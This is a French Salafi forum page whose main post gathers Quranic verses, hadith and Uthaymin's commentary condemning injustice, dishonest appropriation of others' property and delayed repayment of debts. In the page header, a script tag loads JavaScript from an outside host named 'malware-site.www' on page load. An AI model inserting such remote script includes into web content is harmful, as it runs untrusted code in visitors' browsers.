ISLAM SUIVANT LE CORAN ET LA SUNNA

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<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

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Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

	 S’approprier malhonnêtement des biens des gens Artfic11

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
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    S’approprier malhonnêtement des biens des gens

    assalafia
    assalafia
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    	 S’approprier malhonnêtement des biens des gens Empty S’approprier malhonnêtement des biens des gens

    Message par assalafia Sam 12 Mai - 8:11

    	 S’approprier malhonnêtement des biens des gens 650269930L'imâm Adh Dhahabi rahimahu Allah dit :

    Allah
    le Très Haut a dit : Seront seulement poursuivis ceux qui oppriment les
    gens et agissent injustement sur la terre contrairement au droit , ceux
    là sont voués à un châtiment douloureux .


    (sourate Ash Shûrâ verset 42 )

    Il dit aussi : Les injustes n'auront ni protecteur ni soutien (sourate Ash Shûrâ verset 8 )

    Le
    prophète sallallahu 'alayhi wa sallam a dit : L'injustice sera source
    de ténèbres le jour de la résurrection (hadith rapporté par Al Bukharî
    2447 et Muslim 2579).


    Il
    dit aussi : Quiconque s'empare injustement d'un empan de terre , il lui
    sera fait un collier de cet empan d'une épaisseur de sept couches de
    terre le jour du jugement . (hadith rapporté par Al Bukharî 3195 et
    Muslim 1612)


    Allah a dit : En vérité Allah ne lèsera
    personne , fût ce d'une action équivalente en importance au poids d'une
    fourmi . (sourate An Nisâ' verset 40 ).


    Il
    existe un hadith qui parle d'un registre dans lequel Allah ne laisse
    rien sans le prendre en compte , à savoir le registre qui concerne les
    injustices que les serviteurs commettent les uns contres les autres .


    L'envoyé
    d'Allah sallallahu 'alayhi wa sallam a dit : Différer le paiement de sa
    dette est , de la part de celui qui a suffisamment d'argent pour s'en
    acquitter , une injustice . (hadith rapporté par Al Bukharî 2400 et
    Muslim 1564).


    La
    pire des injustices est le faux serment pour priver autrui de son droit
    . Le prophète sallallahu 'alayhi wa sallam a dit : Celui qui prive un
    musulman de son droit en usant de serments mensongers , Allah le fera
    entrer inévitablement en enfer . Même s'il s'agit de quelque chose
    d'insignifiant , demanda t'on ?? Même s'il s'agit d'une bûchette d'arak
    , répondit il . (Hadith rapporté par Muslim 137).


    Le
    prophète sallallahu 'alayhi wa sallam a dit : Celui à qui nous confions
    une quelconque autorité et qui nous dérobe la moindre aiguille , se
    présentera le jour du jugement avec ce qu'il aura fait comme fraude .
    (hadith rapporté par Muslim 1833) .


    Le
    prophète sallallahu 'alayhi wa sallam a dit à propos d'un homme qui fut
    tué lors de l'expédition de Khaybar : La tunique qu'il s'est approprié
    indûment avant le partage du butin est devenu une tunique en flamme sous
    laquelle il brûle . A ces mots , un homme se présenta avec un lacet de
    chaussures (qu'il a soustrait du butin) et l'envoyé d'Allah dit : Un
    lacet - ou deux lacet - de feu . (hadith rapporté par Al Bukharî 4243 et
    Muslim 115).


    Un
    homme dit au prophète sallallahu 'alayhi wa sallam : Envoyé d'Allah ,
    si je combats pour la cause d'Allah en faisant preuve d'une grande
    patience , en comptant sur Allah seul de me récompenser et sans faiblir
    devant l'ennemi , cet effort expiera t'il mes fautes , si je suis tué
    dans le combat ?? Oui mais à condition que tu n'aies pas laissé des
    dettes derrière toi , répondit le prophète . (hadith rapporté par Muslim
    1885).


    Le
    prophète sallallahu 'alayhi wa sallam a dit : Il y a des représentants
    de l'autorité qui disposent à leur guise des biens d'Allah sans y avoir
    droit . L'enfer les attend le jour de la résurrection . (hadith rapporté
    par Al Bukharî 3118).


    Jâbir
    qu'Allah l'agrée rapporte que le prophète sallallahu 'alayhi wa sallam a
    dit à Ka'b 'Ajra : Un corps qui a grandi à partir de gains illicites
    n'entrera pas au paradis (lâ yadkhulu al jannata lahmun nabata min suht)
    . Le feu se chargera de lui . (hadith rapporté par Al Hakim 1/79 et
    Ahmad 3/321-399 Le shaykh al Albanî le qualifie d'authentique voir Sahîh
    at targhîb wa t tarhîb 1728).


    Parmi
    les gens qui encourent les menaces proférées dans ces versets et ces
    hadiths , il y a le percepteur d'impots illégaux , le brigand , le
    voleur , le prestidigitateur , le traître , le faussaire , celui qui
    emprunte des objets et le nie par la suite , celui qui falsifie le poids
    et les mesures , celui qui ramasse de l'argent égaré sans le montrer en
    public , celui qui cache les défauts de la marchandise qu'il vend ,
    celui qui s'adonne aux jeux de hasard , celui qui médit des vendeurs en
    prétendant que la somme payée dépasse de loin le prix réel .


    Commentaire du shaykh Uthaymin Rahimahu Allah :

    Sache
    que le zulm (traduit par injustice) signifie l'omission . Allah le Très
    Haut a en effet dit : Les deux jardins produisaient de bonnes récoltes ,
    sans la moindre omission " fa lam tazlim minhu shay'an (sourate Al
    Kahf verset 33)


    L'injustice
    consiste soit à mettre la main sur quelque chose dont on n'a pas le
    droit , soit à négliger ses devoirs .Ainsi l'injustice tourne autour de
    ces deux axes : l'anbandon d'un devoir et l'exécution d'un acte interdit
    .


    L'injustice
    est de deux sortes : une injustice qui concerne les droits d'Allah et
    une injustice qui touche les droits des gens . La plus grave des deux
    est celle qui concerne les droits d'Allah et Son unicité . Le prophète
    sallallahu 'alayhi wa sallam fut interrogé : Quel est le péché le plus
    grave ? et il répondit : C'est que tu donnes à Allah un semblable alors
    qu'Il t'a créé.


    Vient ensuite l'injustice qui réside dans les péchés capitaux puis celle qui réside dans les péchés véniels.

    Pour
    ce qui est des droits des gens , l'injustice tourne autour de trois
    axes que le prophète sallallahu 'alayhi wa sallam a évoqués dans son
    prône lors du pèlerinagz d'adieu , il a dit : Allah a rendu votre sang ,
    vos biens et votre honneur sacrés de même qu'Il a fait de ce jour un
    jour sacré , de ce mois un mois sacré et de ce pays un pays sacré .
    (hadith rapporté par al Bukharî 1739 et muslim 1679).


    Le
    prophète sallallahu 'alayhi wa sallam entend par l'inviolabilité du
    sang dans ce hadith l'interdiction d'agresser physiquement quelqu'un en
    le blessant ou en attentant à sa vie .


    L'injustice
    qui concerne les biens est le fait de léser quelqu'un dans ses biens en
    refusant de lui donner ce qu'on lui doit ou en utilisant ses biens dans
    des choses illicites.


    Quant à l'injustice relative à l'honneur , c'est le fait d'accuser quelqu'un d'adultère , ou d'homosexualité , ou autre .

    Toutes
    ces formes d'injustices sont interdites et la personne injuste ne
    trouvera aucun soutien le jour du jugement . Allah exalté soi Il a en
    effet dit :


    Ce jour là , il n'y aura plus pour les injustes d'ami intime ni d'intercession recevable (sourate Ghâfir verset 18 )

    Le
    jour de la réssurection , le tyran ne trouvera ni un ami intime qui le
    sauvera du châtiment d'Allah , ni quelqu'un qui se portera volontaire
    pour intercéder en sa faveur parce que toute intercession en sa faveur
    sera irrecevable .


    Allah dit également : Les injustes n'auront pas de partisans (sourate Al Baqara verset 270)

    C'est
    à dire que le jour du jugement , ils ne trouveront personne pour les
    soutenir et les délivrer du châtiment qui les attend .


    Commentaire
    du hadith de Jâbir qu'Allah l'agrée :Prémunisez vous contre l'injustice
    car elle sera source de ténèbres le jour du jugement .


    Prémunissez
    vous contre l'injustice , c'est à dire : Ne soyez pas injustes à
    l'égard de votre propre âme ni à l'égard des autres .


    Elle
    sera source de ténèbres le jour du jugement : Le jour de la
    résurrection il n'y aura de lumière que celle qu'Allah accordera . Quant
    à celui qu'Allah n'a pas pourvu de lumière , il ne la trouvera nulle
    part. La part de lumière dont jouira le musulman le jour de la
    résurrection dépend de sa soumission à Allah . S'il s'est comporté
    injustement envers autrui , il perdra de cette lumière l'équivalent des
    torts qu'il a commis .


    Comme
    autre forme d'injustice il y a le fait de mettre du retard dans le
    paiement d'une dette alors qu'on est dans une situation aisée . Le
    prophète sallallahu 'alayhi wa sallam a dit : Différer le paiement de sa
    dette est , de la part de celui qui a suffisament d'argent pour s'en
    acquitter , une injustice. (hadith rapporté par Al Bukharî 2400 et
    Muslim 1564)


    Combien
    sont nombreux ceux qui mettent du retard à rembourser leurs dettes
    alors qu'ils sont solvables. Chaque fois que leur créancier leur réclame
    son bien , ils lui disent : Demain je le ferai . Or ce retard est une
    injustice qui sera source de ténèbres pour ces débiteurs le jour de la
    réssurection


    La version du hadith de Jâbir qu'Allah l'agrée dans le sahih de Muslim est la suivante :

    Evitez
    l'injustice car l'injustice est source de ténèbres le jour du jugement
    et évitez l'avidité "Shuhh" car elle a causé la perte des communautés
    qui vous ont précédés . Elle les a poussés à verser leur propre sang et à
    violer les droits les plus sacrés.


    Le
    shuhh est le fait d'être avide d'argent . C'est ce qui a causé la perte
    des communautés qui nous ont précédés . En effet , la cupidité pousse
    l'homme à chercher à gagner de l'argent par tous les moyens , qu'ils
    soient légaux ou illégaux.


    Elle
    les a poussés à verser leur propre sang et à violer les droits les plus
    sacrés : L'avidité les a poussés à violer par force le domicile des
    gens et à s'accaparer leurs biens et ils sont allés jusqu'à tuer les
    gens pour prendre leurs biens .


    Le
    prophète sallallahu 'alayhi wa sallam a mis en garde contre ces deux
    maux : L'injustice et l'avidité . L'injustice est le fait de s'en
    prendre à quelqu'un et l'avidité est le fait de convoiter ce que
    quelqu'un possède , et les deux sont interdits . Allah a d'ailleurs dit
    dans Son livre : Ceux qui prémunissent leur âme contre l'avidité , ceux
    là sont assurés de la réussite . (Sourate al Hash verset 9 ) Ce verset
    prouve que celui qui ne se préserve pas de sa propre avidité ne réussira
    jamais . Implorons Allah de protéger notre âme de l'injustice et de
    l'avidité .


    - Commentaire du hadith suivant :

    Quiconque
    s'empare injustement d'un empan de terre , il lui sera fait un collier
    de cet empan d'une épaisseur de sept couches , de terre le Jour du
    Jugement .


    Ce
    hadith présente une des formes d'injustice , à savoir l'appropriation
    sans droit d'une portion d'un terrain appartenant à autrui . Cette forme
    d'injustice est l'un des péchés les plus graves . D'après un hadith
    authentique , le prophète sallallahu 'alayhi wa sallam a maudit celui
    qui déplace frauduleusement les bornes d'un terrain "manâr al ard"
    (c'est un hadith rapporté par Muslim)


    Les
    savants ont dit que manâr al ard signifie les limites des terrains . Le
    terme manâr dérive du mot munawwir qui signifie le repère . Celui qui
    change les limites de son terrain en incluant une partie du terrain de
    son voisin est maudit par le prophète sallallahu 'alayhi wa sallam ,
    c'est à dire qu'il est chassé loin de la miséricorde d'Allah .


    Celui
    qui trafique le cadastre est passible d'une autre punition : Il portera
    autour du cou , le Jour de la Réssurection , les terrains dont il s'est
    emparé injustement , d'une épaisseur de sept couches de terre , comme a
    dit le prophète sallallahu 'alayhi wa sallam dans le hadith ci dessus .


    Ve
    hadith prouve que les terres sont au nombre de sept . Dans le Coran
    également il y a une indication en ce sens . Allah dit : C'est Allah qui
    a créé sept cieux et en a fait autant pour la terre (sourate At Talâq
    verset 12)


    La
    similitude ici n'est valable que dans le nombre car le ciel est plus
    large et plus éminents que la terre . Allah a en effet dit : Considère
    aussi le ciel que Nous avons solidement édifié et dont Nous élargissons
    constamment l'étendue . (sourate Adh Dhâriyât verset 47 )


    Et Il a dit : N'avons Nous pas bâti au dessus de vous sepy cieux inébranlables (sourate An Naba' verset 12)

    Quand
    le prophète sallallahu 'alayhi wa sallam a dit : d'un empan de terre ,
    il n'entend pas par là fixer une largeur de terre au delà de laquelle on
    est châtié et en deçà de laquelle on n'est pas châtié . Il a cité
    l'empan parce qu'elle est l'unité la plus réprésentative de la petitesse
    d'un terrain , car même si on s'empare injustement d'un terrain qui
    fait moins d'un empan , on le portera autour du cou le Jour de la
    Réssurection .


    Ce
    hadith prouve aussi que celui qui possède un terrain possède aussi ce
    qui est en dessous et ce jusqu'à la septième couches de la terre . Nul
    n'a le droit de creuser un tunnel ou de bâtîr un toit sur un terrain
    sans le consentement du propriétaire . Les savants disent que si les
    branches de l'arbre de ton voisin s'étendent sur ton terrain , il doit
    essayer de les ramener sur son terrain . S'il n'y parvient pas et qu'il
    décide de les couper , il ne doit le faire qu'avec ton autorisation .


    -
    Commentaire du hadith rapporté par Abû Mûsâ qu'Allah l'agrée dans
    lequel le prophète sallallahu 'alayhi wa sallam a dit : Allah accorde un
    délai au tyran mais quand Il le saisit , Il ne le laisse plus
    s'échapper . Puis il récita le verset suivant : C'est ainsi qu'Allah
    saisit les cités pour leur injustice : Sa prise est douloureuse et
    évidente . (sourate Hûd verset 102 ) Ce hadith est rapporté par al
    Bukharî 4686 et Muslim 2583.


    Allah
    accorde un répit au tyran afin qu'il persiste dans son injustice . Il
    ne hâte pas son châtiment . Cette épreuve qu'Allah nous en préserve ,
    fait partie de l'abandon progressif par Allah de Son serviteur . Il le
    laisse accumuler les injustices , mais quand Il le saisit , Il le fait
    d'une manière digne d'un Dieu Puissant et Omnipotent . Il ne le laisse
    plus s'échapper . Puis le prophète sallallahu 'alayhi wa sallam récita
    le verset suivant : C'est ainsi qu'Allah saisit les cités pour leur
    injustice : Sa prise est douloureuse et évidente .


    Au
    tyran de ne pas se laisser illusionner par sa propre âme ni par le
    délai qu'Allah lui accorde . Cette double illusion est en réalité une
    double épreuve , car quand une personne commet une injustice et reçoit
    le châtiment immédiatement après , il se peut qu'elle en tire la leçon
    et cesse d'être injuste , mais si un délai lui est accordé , elle
    accumulera les péchés et commettra de plus en plus d'injustices , ce qui
    fait que le châtiment qui l'attend sera plus douloureux .


    (source: extrait du livre commentaire des grands péchés par l'imam adh Dhahabi et commenter par shaykh Uthaymin rahimahu Allah )

      La date/heure actuelle est Lun 6 Mai - 18:39